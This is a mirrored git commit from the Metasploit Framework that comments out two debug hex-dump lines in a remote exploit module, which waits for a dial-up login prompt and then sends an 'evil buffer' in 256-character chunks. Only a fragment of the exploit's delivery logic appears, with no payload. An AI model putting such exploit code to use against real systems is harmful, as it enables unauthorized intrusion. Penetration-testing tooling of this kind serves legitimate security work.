mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
Disabled debugging output
git-svn-id: file:///home/svn/framework3/trunk@6727 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
f14de093ed
commit
e03428dd8f
@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("Waiting for login prompt")
|
||||
|
||||
res = dialup_expect(/ogin:\s/i, 10)
|
||||
puts Rex::Text.to_hex_dump(res[:buffer])
|
||||
#puts Rex::Text.to_hex_dump(res[:buffer])
|
||||
if not res[:match]
|
||||
print_error("Login prompt not found... Exiting.")
|
||||
disconnect_dialup
|
||||
@ -179,7 +179,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
# send the evil buffer, 256 chars at a time
|
||||
print_status("Sending evil buffer...")
|
||||
puts Rex::Text.to_hex_dump(buf)
|
||||
#puts Rex::Text.to_hex_dump(buf)
|
||||
# dialup_puts(buf)
|
||||
len = buf.length
|
||||
p = 0
|
||||
|
Loading…
Reference in New Issue
Block a user